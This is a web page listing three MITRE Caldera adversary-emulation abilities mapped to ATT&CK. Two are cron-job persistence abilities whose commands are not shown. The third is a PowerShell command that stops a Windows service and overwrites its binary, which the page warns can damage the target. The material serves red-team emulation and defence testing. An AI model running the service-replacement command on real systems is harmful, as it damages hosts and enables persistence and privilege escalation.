Caldera emulation abilities
3 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
All tactics
build-capabilities · 1 collection · 16 command-and-control · 6 credential-access · 10 defense-evasion · 15 detection · 8 discovery · 67 execution · 9 exfiltration · 13 hunt · 4 impact · 8 lateral-movement · 10 persistence · 3 privilege-escalation · 8 response · 14 setup · 10 technical-information-gathering · 1 training · 6 verification · 2
⚠
Abilities
3 shown of 3
persistence
[]
Create persistence cron job for current user
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent access after reboot.
Show command
[]
persistence
[]
Create persistence cron job for root user (requires sudo)
After target host is rebooted, it will automatically reach out to the caldera server to download and execute the caldera agent, creating persistent root access after reboot.
Show command
[]
Replace a service binary with alternate binary
This is an example technique. snmptrap.exe should be changed in the command
below with the new desired service binary. Depending on the value of
host.service.modifiable this ability can damage the target system.
Show command
[{"platform": "windows", "executor": "psh", "command": "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n"}]Showing 1-3 of 3